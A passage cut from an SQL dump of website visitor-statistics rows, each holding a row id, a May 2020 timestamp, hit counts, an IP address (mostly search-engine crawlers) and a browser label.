198.26','other'),(503743,1589022933,1,1,0,0,'207.46.13.75','other'),(503744,1589023511,1,1,0,0,'207.46.13.157','other'),(503745,1589023809,1,1,0,0,'2.47.39.222','other'),(503746,1589025216,2,2,0,0,'207.46.13.243','other'),(503747,1589025976,1,1,0,0,'66.249.70.72','chrome'),(503748,1589026116,2,2,0,0,'207.46.13.75','other'),(503749,1589026121,1,1,0,0,'207.46.13.157','other'),(503750,1589026486,1,1,0,0,'66.249.64.33','chrome'),(503751,1589027704,1,1,0,0,'66.249.70.72','chrome'),(503752,1589027749,1,1,0,0,'66.249.70.69','chrome'),(503753,1589028026,1,1,0,0,'66.249.64.38','chrome'),(503754,1589028525,1,1,0,0,'207.46.13.243','other'),(503755,1589028744,1,1,0,0,'207.46.13.157','other'),(503756,1589028846,1,1,0,0,'154.51.131.142','chrome'),(503757,1589028863,8,8,0,0,'77.120.98.235','other'),(503758,1589029004,1,1,0,0,'66.249.70.70','chrome'),(503759,1589030129,1,1,0,0,'207.46.13.243','other'),(503760,1589031190,1,1,0,0,'66.249.70.70','chrome'),(503761,1589031192,1,1,0,0,'66.249.70.72','chrome'),(503762,1589031249,1,1,0,0,'213.180.203.16','other'),(503763,1589032407,1,1,0,0,'66.249.70.70','chrome'),(503764,1589032558,3,3,0,0,'66.249.70.69','chrome'),(503765,1589032735,1,1,0,0,'207.46.13.157','other'),(503766,1589032772,2,2,0,0,'8.29.198.27','other'),(503767,1589032940,1,1,0,0,'207.46.13.75','other'),(503768,1589034638,1,1,0,0,'66.249.64.33','chrome'),(503769,1589035645,1,1,0,0,'207.46.13.243','other'),(503770,1589035712,1,1,0,0,'207.46.13.157','other'),(503771,1589036603,1,1,0,0,'178.154.200.222','other'),(503773,1589037224,1,1,0,0,'207.46.13.75','other'),(503774,1589037301,1,1,0,0,'66.249.70.70','chrome'),(503775,1589038468,1,1,0,0,'207.46.13.75','other'),(503776,1589039005,1,1,0,0,'46.118.122.16','chrome'),(503777,1589041451,1,1,0,0,'207.46.13.157','other'),(503778,1589041581,1,1,0,0,'207.46.13.75','other'),(503779,1589042568,2,2,0,0,'178.154.200.222','other'),(503780,1589042690,1,1,0,0,'173.252.111.3','other'),(503781,1589042691,1,1,0,0,'173.252.111.15','other'),(503782,1589043616,1,1,0,0,'8.29.198.27','other'),(503783,1589043962,1,1,0,0,'8.29.198.26','other'),(503784,1589043992,2,2,0,0,'157.55.39.8','other'),(503785,1589044205,7,7,0,0,'178.154.200.222','other'),(503786,1589044905,1,1,0,0,'66.249.70.69','chrome'),(503787,1589045184,1,1,0,0,'178.154.200.222','other'),(503788,1589045401,1,1,0,0,'213.180.203.16','other'),(503789,1589046449,2,2,0,0,'178.154.200.222','other'),(503790,1589046594,1,1,0,0,'178.154.200.87','other'),(503791,1589047082,1,1,0,0,'66.249.64.38','chrome'),(503792,1589047220,1,1,0,0,'157.55.39.8','other'),(503793,1589047612,1,1,0,0,'178.154.200.220','other'),(503794,1589047661,4,4,0,0,'178.154.200.222','other'),(503795,1589047942,2,2,0,0,'213.180.203.16','other'),(503796,1589048076,1,1,0,0,'207.46.13.243','other'),(503797,1589048487,1,1,0,0,'178.154.200.216','other'),(503798,1589049376,3,3,0,0,'178.154.200.222','other'),(503799,1589049736,1,1,0,0,'173.252.111.112','other'),(503801,1589049861,1,1,0,0,'173.252.111.18','other'),(503802,1589050186,1,1,0,0,'157.55.39.143','other'),(503803,1589050475,2,2,0,0,'178.154.200.222','other'),(503804,1589051528,3,3,0,0,'213.180.203.16','other'),(503805,1589051590,1,1,0,0,'66.249.70.69','chrome'),(503806,1589052082,1,1,0,0,'69.171.251.3','other'),(503807,1589052084,1,1,0,0,'69.171.251.8','other'),(503808,1589053236,2,2,0,0,'213.180.203.16','other'),(503809,1589054143,1,1,0,0,'213.180.203.16','other'),(503810,1589054163,1,1,0,0,'92.38.136.69','chrome'),(503811,1589054444,1,1,0,0,'8.29.198.26','other'),(503812,1589054446,1,1,0,0,'66.249.70.72','chrome'),(503813,1589054795,1,1,0,0,'8.29.198.27','other'),(503814,1589054865,1,1,0,0,'66.249.64.38','chrome'),(503815,1589055073,1,1,0,0,'84.17.42.5','chrome'),(503816,1589055164,1,1,0,0,'178.154.200.222','other'),(503817,1589055765,1,1,0,0,'178.154.200.92','other'),(503818,1589056838,2,2,0,0,'178.154.200.222','other'),(503819,1589057036,1,1,0,0,'207.46.13.243','other'),(503820,1589057434,1,1,0,0,'213.180.203.29','other'),(503821,1589057758,1,1,0,0,'207.46.13.157','other'),(503822,1589058073,1,1,0,0,'178.154.200.222','other'),(503823,1589058602,1,1,0,0,'66.249.70.69','chrome'),(503824,1589058972,1,1,0,0,'213.180.203.109','other'),(503825,1589059325,59,59,0,0,'136.243.176.156','other'),(503826,1589059650,1,1,0,0,'157.55.39.143','other'),(503827,1589060050,1,1,0,0,'213.180.203.109','other'),(503828,1589060098,1,1,0,0,'207.46.13.243','other'),(503829,1589060244,65,65,0,0,'136.243.176.156','other'),(503830,1589060330,1,1,0,0,'207.46.13.157','other'),(503831,1589061062,1,1,0,0,'178.154.200.222','other'),(503832,1589061162,59,59,0,0,'136.243.176.156','other'),(503833,1589061373,1,1,0,0,'178.154.200.22','other'),(503834,1589061569,2,2,0,0,'66.249.70.69','chrome'),(503835,1589061658,1,1,0,0,'157.55.39.143','other'),(503836,1589061955,2,2,0,0,'213.180.203.109','other'),(503837,1589062065,60,60,0,0,'136.243.176.156','other'),(503838,1589062985,60,60,0,0,'136.243.176.156','other'),(503839,1589063034,2,2,0,0,'178.154.200.222','other'),(503840,1589063422,1,1,0,0,'178.154.200.97','other'),(503841,1589063452,1,1,0,0,'157.55.39.143','other'),(503842,1589063913,56,56,0,0,'136.243.176.156','other'),(503843,1589064080,1,1,0,0,'213.180.203.16','other'),(503844,1589064613,8,8,0,0,'77.120.98.235','other'),(503845,1589064829,60,60,0,0,'136.243.176.156','other'),(503846,1589065273,2,2,0,0,'8.29.198.25','other'),(503847,1589065466,1,1,0,0,'178.154.200.112','other'),(503848,1589065731,57,57,0,0,'136.243.176.156','other'),(503849,1589065825,1,1,0,0,'213.180.203.16','other'),(503850,1589065941,1,1,0,0,'178.154.200.220','other'),(503851,1589066378,1,1,0,0,'207.46.13.157','other'),(503852,1589066478,1,1,0,0,'157.55.39.8','other'),(503853,1589066638,61,61,0,0,'136.243.176.156','other'),(503854,1589067227,1,1,0,0,'52.14.24.39','chrome'),(503855,1589067376,1,1,0,0,'207.46.13.243','other'),(503856,1589067534,1,1,0,0,'178.154.200.112','other'),(503857,1589067540,56,56,0,0,'136.243.176.156','other'),(503858,1589067599,1,1,0,0,'207.46.13.157','other'),(503859,1589068442,56,56,0,0,'136.243.176.156','other'),(503860,1589068507,1,1,0,0,'62.205.134.182','other'),(503861,1589068519,1,1,0,0,'213.180.203.142','other'),(503862,1589069348,53,53,0,0,'136.243.176.156','other'),(503863,1589070228,1,1,0,0,'213.180.203.90','other'),(503864,1589070247,1,1,0,0,'178.154.200.67','other'),(503865,1589070250,60,60,0,0,'136.243.176.156','other'),(503866,1589070309,1,0,1,0,'66.249.70.70',''),(503867,1589070376,1,1,0,0,'178.154.200.75','other'),(503868,1589070834,1,1,0,0,'66.249.70.72','chrome'),(503869,1589071116,1,1,0,0,'178.154.200.222','other'),(503870,1589071152,57,57,0,0,'136.243.176.156','other'),(503871,1589071223,1,1,0,0,'31.202.101.40','chrome'),(503872,1589072058,59,59,0,0,'136.243.176.156','other'),(503873,1589072343,1,1,0,0,'66.249.70.69','chrome'),(503874,1589072540,1,1,0,0,'207.46.13.243','other'),(503875,1589072577,1,1,0,0,'213.180.203.142','other'),(503876,1589072598,1,1,0,0,'178.154.200.175','other'),(503877,1589072962,19,19,0,0,'136.243.176.156','other'),(503878,1589073293,1,1,0,0,'178.154.200.236','other'),(503879,1589073557,1,1,0,0,'178.154.200.176','other'),(503880,1589073613,1,1,0,0,'213.180.203.17','other'),(503881,1589073734,1,1,0,0,'213.180.203.16','other'),(503882,1589073867,17,17,0,0,'136.243.176.156','other'),(503883,1589073962,1,1,0,0,'66.249.64.36','chrome'),(503884,1589074225,1,1,0,0,'213.180.203.155','other'),(503885,1589074399,1,1,0,0,'178.154.200.245','other'),(503886,1589074772,1,1,0,0,'66.249.70.69','chrome'),(503887,1589074908,3,3,0,0,'136.243.176.156','other'),(503888,1589075276,1,1,0,0,'213.180.203.155','other'),(503889,1589075279,1,1,0,0,'213.180.203.81','other'),(503890,1589075296,71,71,0,0,'45.227.253.90','chrome'),(503891,1589075468,2,2,0,0,'213.180.203.17','other'),(503892,1589075478,1,1,0,0,'213.180.203.122','other'),(503893,1589075929,1,1,0,0,'66.249.70.72','chrome'),(503894,1589076017,1,1,0,0,'66.249.70.69','chrome'),(503895,1589076097,2,2,0,0,'8.29.198.25','other'),(503896,1589076115,24,24,0,0,'136.243.176.156','other'),(503897,1589077082,1,1,0,0,'178.154.200.222','other'),(503898,1589077295,3,3,0,0,'66.249.70.69','chrome'),(503899,1589077314,1,1,0,0,'136.243.176.156','other'),(503900,1589077334,2,2,0,0,'66.249.70.70','chrome'),(503901,1589077821,1,1,0,0,'207.46.13.243','other'),(503902,1589078228,8,8,0,0,'77.120.98.235','other'),(503903,1589078282,1,1,0,0,'66.249.70.69','chrome'),(503904,1589078302,1,1,0,0,'66.249.70.70','chrome'),(503905,1589078508,1,1,0,0,'136.243.176.156','other'),(503906,1589078949,2,2,0,0,'178.154.200.222','other'),(503907,1589079079,1,1,0,0,'207.46.13.6','other'),(503908,1589079763,1,1,0,0,'66.249.64.33','chrome'),(503909,1589080319,1,1,0,0,'178.154.200.41','other'),(503910,1589080446,1,1,0,0,'66.249.70.72','chrome'),(503911,1589081256,2,2,0,0,'178.154.200.222','other'),(503912,1589081345,1,1,0,0,'213.180.203.16','other'),(503913,1589081895,2,2,0,0,'35.192.118.38','chrome'),(503914,1589081915,3,3,0,0,'35.193.234.181','chrome'),(503915,1589081925,2,2,0,0,'146.148.40.75','chrome'),(503917,1589081935,4,4,0,0,'34.67.63.0','chrome'),(503919,1589081952,2,2,0,0,'35.239.76.33','chrome'),(503921,1589082036,1,1,0,0,'207.46.13.6','other'),(503922,1589083315,2,2,0,0,'178.154.200.222','other'),(503923,1589083878,1,1,0,0,'178.154.200.236','other'),(503924,1589083983,1,1,0,0,'178.154.200.220','other'),(503925,1589084496,2,2,0,0,'178.154.200.222','other'),(503926,1589084505,1,1,0,0,'66.249.70.72','chrome'),(503927,1589084673,1,1,0,0,'207.46.13.6','other'),(503928,1589085558,1,1,0,0,'213.180.203.16','other'),(503929,1589085896,1,1,0,0,'62.205.134.182','other'),(503930,1589086035,2,2,0,0,'66.249.70.69','chrome'),(503931,1589086048,1,1,0,0,'213.180.203.109','other'),(503932,1589086448,2,2,0,0,'207.46.13.157','other'),(503933,1589086568,1,1,0,0,'213.180.203.16','other'),(503934,1589086886,3,3,0,0,'178.154.200.222','other'),(503935,1589086929,1,1,0,0,'8.29.198.25','other'),(503936,1589087131,1,1,0,0,'213.180.203.148','other'),(503937,1589087273,1,1,0,0,'8.29.198.26','other'),(503938,1589087658,1,1,0,0,'207.46.13.157','other'),(503939,1589087907,2,2,0,0,'178.154.200.222','other'),(503940,1589088020,1,1,0,0,'66.249.70.70','chrome'),(503941,1589088093,1,1,0,0,'207.46.13.6','other'),(503942,1589088111,2,2,0,0,'66.249.70.69','chrome'),(503943,1589089091,1,1,0,0,'66.249.70.69','chrome'),(503944,1589089106,2,2,0,0,'213.180.203.16','other'),(503945,1589089400,2,2,0,0,'178.154.200.222','other'),(503946,1589089641,6,6,0,0,'66.249.70.70','chrome'),(503947,1589090228,2,2,0,0,'66.249.64.33','chrome'),(503948,1589090232,2,2,0,0,'66.249.64.36','chrome'),(503949,1589090234,1,1,0,0,'66.249.70.72','chrome'),(503950,1589090351,1,1,0,0,'207.46.13.157','other'),(503951,1589090470,3,3,0,0,'178.154.200.222','other'),(503952,1589091022,2,2,0,0,'66.249.70.69','chrome'),(503953,1589091025,1,1,0,0,'66.249.70.70','chrome'),(503954,1589091402,4,4,0,0,'178.154.200.222','other'),(503955,1589091719,8,8,0,0,'77.120.98.235','other'),(503956,1589092074,2,2,0,0,'66.249.70.70','chrome'),(503957,1589092286,1,1,0,0,'213.180.203.16','other'),(503958,1589092329,1,1,0,0,'66.249.70.72','chrome'),(503959,1589093285,1,1,0,0,'207.46.13.157','other'),(503960,1589093545,1,1,0,0,'178.154.200.222','other'),(503961,1589093996,1,1,0,0,'66.249.70.70','chrome'),(503962,1589094068,3,3,0,0,'66.249.70.69','chrome'),(503963,1589094358,1,1,0,0,'66.249.70.72','chrome'),(503964,1589095507,1,1,0,0,'66.249.64.33','chrome'),(503965,1589095549,1,1,0,0,'207.46.13.185','other'),(503966,1589095654,1,1,0,0,'66.249.70.72','chrome'),(503967,1589095685,1,1,0,0,'178.154.200.236','other'),(503968,1589095746,1,1,0,0,'66.249.70.69','chrome'),(503969,1589095789,3,3,0,0,'178.154.200.222','other'),(503970,1589095807,1,1,0,0,'213.180.203.16','other'),(503971,1589096143,1,1,0,0,'131.220.6.152','chrome'),(503972,1589096651,2,2,0,0,'66.249.70.72','chrome'),(503973,1589096961,1,1,0,0,'159.224.217.20','chrome'),(503974,1589097439,1,1,0,0,'213.180.203.16','other'),(503975,1589097756,1,1,0,0,'8.29.198.27','other'),(503976,1589097855,2,2,0,0,'207.46.13.157','other'),(503977,1589097859,1,1,0,0,'207.46.13.6','other'),(503978,1589097864,1,1,0,0,'207.46.13.185','other'),(503979,1589098102,1,1,0,0,'8.29.198.25','other'),(503980,1589098166,3,3,0,0,'178.154.200.222','other'),(503981,1589098292,1,1,0,0,'66.249.70.69','chrome'),(503982,1589098672,1,1,0,0,'213.180.203.16','other'),(503983,1589098838,1,1,0,0,'207.46.13.185','other'),(503984,1589099332,3,3,0,0,'66.249.70.70','chrome'),(503985,1589099525,1,1,0,0,'66.249.64.36','chrome'),(503986,1589099790,2,2,0,0,'213.180.203.16','other'),(503987,1589099948,1,1,0,0,'178.154.200.222','other'),(503988,1589100364,1,1,0,0,'178.154.200.220','other'),(503989,1589101398,4,4,0,0,'66.249.70.72','chrome'),(503990,1589101453,1,1,0,0,'91.196.178.180','chrome'),(503991,1589102102,1,1,0,0,'66.249.70.70','chrome'),(503992,1589102106,1,1,0,0,'51.15.24.136','other'),(503993,1589102772,3,3,0,0,'178.154.200.222','other'),(503994,1589103164,1,1,0,0,'194.61.24.94','other'),(503995,1589103340,1,1,0,0,'66.249.70.72','chrome'),(503996,1589103352,8,8,0,0,'77.120.98.235','other'),(503997,1589103614,3,3,0,0,'66.249.70.70','chrome'),(503998,1589103762,1,1,0,0,'66.249.64.33','chrome'),(503999,1589103769,1,1,0,0,'178.154.200.222','other'),(504000,1589104169,1,1,0,0,'207.46.13.6','other'),(504001,1589105750,1,1,0,0,'178.154.200.222','other'),(504002,1589106336,1,1,0,0,'213.180.203.142','other'),(504003,1589106441,1,0,1,0,'66.249.70.72',''),(504004,1589107687,2,2,0,0,'178.154.200.222','other'),(504005,1589108532,1,1,0,0,'109.74.154.72','chrome'),(504006,1589108582,2,2,0,0,'8.29.198.26','other'),(504007,1589108691,1,1,0,0,'207.46.13.6','other'),(504008,1589108700,1,1,0,0,'178.154.200.222','other'),(504009,1589108858,1,0,1,0,'66.249.70.70',''),(504010,1589108990,1,1,0,0,'66.249.70.72','chrome'),(504011,1589109606,3,3,0,0,'178.154.200.222','other'),(504012,1589110450,1,1,0,0,'178.154.200.216','other'),(504013,1589110551,1,1,0,0,'178.154.200.222','other'),(504014,1589110665,1,1,0,0,'66.249.70.69','chrome'),(504015,1589110679,1,1,0,0,'66.249.70.70','chrome'),(504016,1589111075,2,2,0,0,'66.249.70.72','chrome'),(504017,1589111711,1,1,0,0,'66.249.70.70','chrome'),(504018,1589112055,5,5,0,0,'207.46.13.13','other'),(504019,1589112290,1,1,0,0,'66.249.70.72','chrome'),(504020,1589112498,2,2,0,0,'66.249.64.38','chrome'),(504021,1589112541,2,2,0,0,'157.55.39.217','other'),(504022,1589112744,1,1,0,0,'178.154.200.222','other'),(504023,1589112827,2,2,0,0,'207.46.13.6','other'),(504024,1589113014,1,1,0,0,'213.180.203.16','other'),(504025,1589113106,2,2,0,0,'66.249.70.69','chrome'),(504026,1589113666,8,8,0,0,'77.120.98.235','other'),(504027,1589113888,2,2,0,0,'157.55.39.217','other'),(504028,1589114025,1,1,0,0,'66.249.70.70','chrome'),(504029,1589114131,1,1,0,0,'66.249.70.69','chrome'),(504030,1589114462,1,1,0,0,'66.249.64.38','chrome'),(504031,1589114754,1,1,0,0,'178.154.200.222','other'),(504032,1589114996,1,1,0,0,'207.46.13.13','other'),(504033,1589115046,2,2,0,0,'207.46.13.6','other'),(504034,1589115726,1,1,0,0,'66.249.70.70','chrome'),(504035,1589116003,3,3,0,0,'66.249.70.72','chrome'),(504036,1589117092,2,2,0,0,'66.249.70.72','chrome'),(504037,1589117550,1,1,0,0,'66.249.70.70','chrome'),(504038,1589118180,1,1,0,0,'66.249.64.33','chrome'),(504039,1589118449,1,1,0,0,'66.249.70.69','chrome'),(504040,1589118576,1,1,0,0,'66.249.70.70','chrome'),(504041,1589118627,2,2,0,0,'178.154.200.222','other'),(504042,1589118807,2,2,0,0,'207.46.13.6','other'),(504043,1589119065,1,1,0,0,'157.55.39.217','other'),(504044,1589119246,2,2,0,0,'207.46.13.13','other'),(504045,1589119411,1,1,0,0,'8.29.198.25','other'),(504046,1589119756,1,1,0,0,'8.29.198.27','other'),(504047,1589119764,1,1,0,0,'207.46.13.6','other'),(504048,1589119856,1,1,0,0,'213.180.203.16','other'),(504049,1589120258,2,2,0,0,'66.249.70.70','chrome'),(504050,1589120968,1,1,0,0,'66.249.70.69','chrome'),(504051,1589121036,2,2,0,0,'66.249.70.72','chrome'),(504052,1589121327,2,2,0,0,'213.180.203.16','other'),(504053,1589121464,1,1,0,0,'66.249.64.38','chrome'),(504054,1589121532,1,1,0,0,'157.55.39.217','other'),(504055,1589121843,2,2,0,0,'66.249.70.70','chrome'),(504056,1589121869,1,1,0,0,'207.46.13.6','other'),(504057,1589121980,1,1,0,0,'66.249.64.33','chrome'),(504058,1589122014,3,3,0,0,'178.154.200.222','other'),(504059,1589123141,1,1,0,0,'178.154.200.220','other'),(504060,1589123513,2,2,0,0,'207.46.13.6','other'),(504061,1589124028,1,1,0,0,'213.180.203.17','other'),(504062,1589124064,1,1,0,0,'213.180.203.142','other'),(504063,1589124296,2,2,0,0,'213.180.203.16','other'),(504064,1589124671,2,2,0,0,'66.249.70.70','chrome'),(504065,1589125019,8,8,0,0,'77.120.98.235','other'),(504066,1589125228,6,6,0,0,'178.154.200.222','other'),(504067,1589126011,1,1,0,0,'207.46.13.13','other'),(504068,1589126026,1,1,0,0,'95.133.238.58','chrome'),(504069,1589126303,1,1,0,0,'178.154.200.220','other'),(504070,1589127556,1,1,0,0,'207.46.13.13','other'),(504071,1589128134,2,2,0,0,'157.55.39.186','other'),(504072,1589128551,2,2,0,0,'5.101.156.139','other'),(504073,1589129473,2,2,0,0,'207.46.13.13','other'),(504074,1589129739,2,2,0,0,'207.46.13.6','other'),(504075,1589130243,1,1,0,0,'8.29.198.25','other'),(504076,1589130553,1,1,0,0,'66.249.70.72','chrome'),(504077,1589130577,1,1,0,0,'157.55.39.186','other'),(504078,1589130584,1,1,0,0,'8.29.198.26','other'),(504079,1589130665,1,1,0,0,'207.46.13.6','other'),(504080,1589130780,2,2,0,0,'66.249.70.69','chrome'),(504081,1589131037,1,1,0,0,'185.41.240.28','firefox'),(504082,1589131826,1,1,0,0,'207.46.13.13','other'),(504083,1589132459,1,1,0,0,'207.46.13.6','other'),(504084,1589132487,1,1,0,0,'51.15.24.136','other'),(504085,1589132698,1,1,0,0,'178.154.200.222','other'),(504086,1589133945,1,1,0,0,'178.154.200.220','other'),(504087,1589134034,2,2,0,0,'178.154.200.222','other'),(504088,1589134216,1,1,0,0,'213.180.203.29','other'),(504089,1589136004,1,1,0,0,'157.55.39.186','other'),(504090,1589136026,1,1,0,0,'66.249.70.70','chrome'),(504091,1589136057,1,1,0,0,'213.180.203.140','other'),(504092,1589136074,1,1,0,0,'213.180.203.16','other'),(504093,1589136396,1,1,0,0,'66.249.70.72','chrome'),(504094,1589136859,8,8,0,0,'77.120.98.235','other'),(504095,1589137076,1,1,0,0,'66.249.70.69','chrome'),(504096,1589137347,1,1,0,0,'213.180.203.16','other'),(504097,1589137421,1,1,0,0,'91.196.178.72','chrome'),(504098,1589137476,2,2,0,0,'178.154.200.222','other'),(504099,1589137693,2,2,0,0,'66.249.70.70','chrome'),(504100,1589137927,1,1,0,0,'66.249.64.38','chrome'),(504101,1589138763,1,1,0,0,'82.148.19.238','other'),(504102,1589139606,1,1,0,0,'66.249.64.36','chrome'),(504103,1589139692,2,1,1,0,'66.249.70.72',''),(504104,1589139815,1,1,0,0,'178.154.200.222','other'),(504105,1589139940,1,1,0,0,'178.154.200.196','other'),(504106,1589140157,1,1,0,0,'213.180.203.16','other'),(504107,1589140819,1,1,0,0,'66.249.70.70','chrome'),(504108,1589140895,4,4,0,0,'66.249.70.69','chrome'),(504109,1589141065,1,1,0,0,'8.29.198.25','other'),(504110,1589141160,1,1,0,0,'178.154.200.222','other'),(504111,1589141404,1,1,0,0,'8.29.198.26','other'),(504112,1589141589,2,2,0,0,'66.249.70.72','chrome'),(504113,1589142221,1,1,0,0,'207.46.13.6','other'),(504114,1589142480,1,1,0,0,'213.180.203.16','other'),(504115,1589142966,3,3,0,0,'66.249.70.70','chrome'),(504116,1589143412,1,1,0,0,'178.154.200.220','other'),(504117,1589143553,1,1,0,0,'66.249.70.69','chrome'),(504118,1589143756,2,2,0,0,'178.154.200.222','other'),(504119,1589144837,2,2,0,0,'66.249.70.72','chrome'),(504120,1589144922,1,1,0,0,'178.154.200.106','other'),(504121,1589145284,1,1,0,0,'178.154.200.196','other'),(504122,1589145386,2,2,0,0,'66.249.70.69','chrome'),(504123,1589145771,1,1,0,0,'178.154.200.236','other'),(504124,1589146052,2,2,0,0,'66.249.70.70','chrome'),(504125,1589146401,2,2,0,0,'178.154.200.222','other'),(504126,1589147430,1,1,0,0,'66.249.70.70','chrome'),(504127,1589148330,1,1,0,0,'178.154.200.222','other'),(504128,1589148651,1,1,0,0,'212.98.190.44','firefox'),(504129,1589148655,1,1,0,0,'212.98.190.44','chrome'),(504130,1589148661,1,1,0,0,'212.98.190.44','other'),(504131,1589148954,1,1,0,0,'207.46.13.6','other'),(504132,1589149171,1,1,0,0,'66.249.70.72','chrome'),(504133,1589149190,1,1,0,0,'66.249.70.69','chrome'),(504134,1589149313,2,2,0,0,'157.55.39.186','other'),(504135,1589149436,1,1,0,0,'213.180.203.16','other'),(504136,1589149685,1,1,0,0,'66.249.64.38','chrome'),(504137,1589149710,3,3,0,0,'66.249.70.70','chrome'),(504138,1589149907,1,1,0,0,'207.46.13.6','other'),(504139,1589149980,8,8,0,0,'77.120.98.235','other'),(504140,1589150512,1,1,0,0,'213.180.203.16','other'),(504141,1589151115,1,1,0,0,'66.249.64.38','chrome'),(504142,1589151209,2,2,0,0,'178.154.200.222','other'),(504143,1589151412,1,1,0,0,'66.249.64.36','chrome'),(504144,1589151504,2,2,0,0,'157.55.39.186','other'),(504145,1589151509,1,1,0,0,'207.46.13.6','other'),(504146,1589151529,3,3,0,0,'66.249.70.70','chrome'),(504147,1589151859,1,1,0,0,'66.249.70.72','chrome'),(504148,1589151892,1,1,0,0,'8.29.198.26','other'),(504149,1589151961,1,1,0,0,'178.154.200.196','other'),(504150,1589152156,1,1,0,0,'17.58.99.84','other'),(504151,1589152231,1,1,0,0,'8.29.198.25','other'),(504152,1589152502,1,1,0,0,'207.46.13.6','other'),(504153,1589152910,1,1,0,0,'66.249.70.69','chrome'),(504154,1589153455,1,1,0,0,'213.180.203.16','other'),(504155,1589153460,1,1,0,0,'213.180.203.101','other'),(504156,1589153567,1,1,0,0,'66.249.70.70','chrome'),(504157,1589154165,1,1,0,0,'207.46.13.183','other'),(504158,1589154662,1,1,0,0,'157.55.39.186','other'),(504159,1589154906,1,1,0,0,'62.205.134.182','other'),(504160,1589155037,1,1,0,0,'66.249.70.69','chrome'),(504161,1589156071,2,2,0,0,'66.249.70.70','chrome'),(504162,1589156300,1,1,0,0,'207.46.13.6','other'),(504163,1589156647,2,2,0,0,'66.249.70.72','chrome'),(504164,1589157035,1,1,0,0,'213.180.203.95','other'),(504165,1589157461,1,1,0,0,'66.249.70.70','chrome'),(504166,1589158049,1,1,0,0,'207.46.13.6','other'),(504167,1589158229,2,2,0,0,'66.249.70.72','chrome'),(504168,1589158340,1,1,0,0,'178.154.200.47','other'),(504169,1589158370,2,2,0,0,'66.249.70.70','chrome'),(504170,1589158395,1,1,0,0,'66.249.70.69','chrome'),(504171,1589158472,1,1,0,0,'207.46.13.183','other'),(504172,1589159518,1,1,0,0,'66.249.70.70','chrome'),(504173,1589159548,1,1,0,0,'93.72.0.175','firefox'),(504174,1589159815,2,2,0,0,'66.249.70.69','chrome'),(504175,1589159824,1,1,0,0,'178.154.200.222','other'),(504176,1589160295,1,1,0,0,'178.159.37.69','chrome'),(504177,1589160413,2,2,0,0,'66.249.64.36','chrome'),(504178,1589160427,1,1,0,0,'66.249.64.38','chrome'),(504179,1589160859,2,2,0,0,'178.154.200.222','other'),(504180,1589162125,1,1,0,0,'66.249.64.38','chrome'),(504181,1589162134,3,3,0,0,'178.154.200.222','other'),(504182,1589162139,1,1,0,0,'66.249.70.70','chrome'),(504183,1589162372,1,1,0,0,'207.46.13.6','other'),(504184,1589162590,1,1,0,0,'93.124.78.229','chrome'),(504185,1589162722,2,2,0,0,'8.29.198.27','other'),(504186,1589163326,1,1,0,0,'66.249.64.36','chrome'),(504187,1589163370,1,1,0,0,'178.154.200.222','other'),(504188,1589163549,3,3,0,0,'66.249.70.72','chrome'),(504189,1589163583,1,1,0,0,'66.249.70.70','chrome'),(504190,1589163847,1,1,0,0,'95.190.36.220','chrome'),(504191,1589164397,1,1,0,0,'178.154.200.245','other'),(504192,1589164646,8,8,0,0,'77.120.98.235','other'),(504193,1589164657,2,2,0,0,'207.46.13.183','other'),(504194,1589164875,1,1,0,0,'157.55.39.186','other'),(504195,1589165003,1,1,0,0,'66.249.64.33','chrome'),(504196,1589165129,1,1,0,0,'178.154.200.222','other'),(504197,1589165392,1,1,0,0,'66.249.70.70','chrome'),(504198,1589165606,3,3,0,0,'66.249.70.72','chrome'),(504199,1589166222,1,1,0,0,'213.180.203.16','other'),(504200,1589166227,1,1,0,0,'178.154.200.222','other'),(504201,1589166685,1,1,0,0,'66.249.64.38','chrome'),(504202,1589166768,1,1,0,0,'66.249.70.70','chrome'),(504203,1589167415,1,1,0,0,'66.249.70.72','chrome'),(504204,1589167760,1,1,0,0,'66.249.70.70','chrome'),(504205,1589167801,1,1,0,0,'157.55.39.217','other'),(504206,1589168256,1,1,0,0,'66.249.70.69','chrome'),(504207,1589168273,2,2,0,0,'178.154.200.222','other'),(504208,1589168922,1,1,0,0,'66.249.70.70','chrome'),(504209,1589170050,2,2,0,0,'66.249.70.70','chrome'),(504210,1589170145,1,1,0,0,'178.154.200.222','other'),(504211,1589170386,1,1,0,0,'66.249.70.69','chrome'),(504212,1589170852,1,1,0,0,'207.46.13.6','other'),(504213,1589171385,1,1,0,0,'157.55.39.217','other'),(504214,1589172003,4,4,0,0,'94.130.9.183','other'),(504215,1589172076,1,1,0,0,'178.154.200.222','other'),(504216,1589172137,2,2,0,0,'66.249.70.70','chrome'),(504217,1589172388,1,1,0,0,'62.205.134.182','other'),(504218,1589172669,1,1,0,0,'213.180.203.16','other'),(504219,1589172723,1,1,0,0,'207.46.13.6','other'),(504220,1589172929,2,2,0,0,'66.249.64.33','chrome'),(504221,1589173017,2,2,0,0,'66.249.70.72','chrome'),(504222,1589173055,1,1,0,0,'207.46.13.183','other'),(504223,1589173550,1,1,0,0,'8.29.198.25','other'),(504224,1589173875,1,1,0,0,'8.29.198.27','other'),(504225,1589173900,1,1,0,0,'31.13.103.23','other'),(504226,1589173901,2,2,0,0,'31.13.103.12','other'),(504228,1589174067,1,1,0,0,'66.249.70.70','chrome'),(504229,1589174124,2,2,0,0,'66.249.64.33','chrome'),(504230,1589174518,1,1,0,0,'178.154.200.222','other'),(504231,1589174544,1,1,0,0,'207.46.13.6','other'),(504232,1589175044,1,1,0,0,'114.255.112.66','chrome'),(504233,1589175467,1,1,0,0,'66.249.70.70','chrome'),(504234,1589175686,1,1,0,0,'66.249.64.36','chrome'),(504235,1589175701,1,1,0,0,'66.249.70.72','chrome'),(504236,1589175953,1,1,0,0,'178.154.200.222','other'),(504237,1589176148,1,1,0,0,'66.249.70.69','chrome'),(504238,1589176432,2,2,0,0,'207.46.13.183','other'),(504239,1589176860,1,1,0,0,'178.154.200.196','other'),(504240,1589177213,2,2,0,0,'66.249.70.69','chrome'),(504241,1589177471,2,2,0,0,'66.249.70.72','chrome'),(504242,1589177568,1,1,0,0,'66.249.70.70','chrome'),(504243,1589177778,2,2,0,0,'66.249.64.38','chrome'),(504244,1589177782,1,1,0,0,'66.249.64.36','chrome'),(504245,1589178400,2,2,0,0,'66.249.70.69','chrome'),(504246,1589178489,1,1,0,0,'178.154.200.222','other'),(504247,1589178734,8,8,0,0,'77.120.98.235','other'),(504248,1589179107,1,1,0,0,'178.154.200.196','other'),(504249,1589179343,2,2,0,0,'66.249.70.69','chrome'),(504250,1589179449,1,1,0,0,'157.55.39.217','other'),(504251,1589179972,1,1,0,0,'157.55.39.186','other'),(504252,1589180298,1,1,0,0,'178.154.200.222','other'),(504253,1589180325,1,1,0,0,'66.249